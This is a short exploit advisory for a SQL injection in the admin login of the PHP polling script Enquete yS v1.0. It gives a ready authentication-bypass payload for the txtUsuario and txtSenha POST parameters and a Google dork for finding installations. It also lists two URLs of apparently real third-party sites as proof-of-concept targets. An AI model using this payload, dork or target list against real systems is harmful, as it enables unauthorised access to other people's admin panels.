Enquete yS version 1.0 suffers from a remote SQL injection vulnerability.
c8d2e2d5d89b0d778cdf2b3e7843e7fbcf459acd5e151d5c728af63f22dce0a6
# Enquete yS - Full v. 1.0 POST SQL Injection in Panel Admin
# Risk: High
# CWE number: CWE-89
# Author: Hugo Santiago dos Santos
# Contact: hugo.s@linuxmail.com
# Date: 08/05/2014
# Vendor Homepage: https://phpbrasil.com/script/AG216GUqK7nS/enquete-ys--full-v-10-yourspotcombr
# Version: v1.0
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: intitle:ys :: Painel
# Url vul : https://host/patch/enquete/admin/
# Exploit:
Post in parameters txtUsuario & txtSENHA
Post exploit = txtUsuario='-&txtSenha='-&btnLogar=Logar+no+sistema+>>
Username = '- and Password = '-
# PoC : https://www.sercoladm.com.br/adm/enquete/admin/
https://www.sgnet-rs.com.br/scripts/enquete/admin/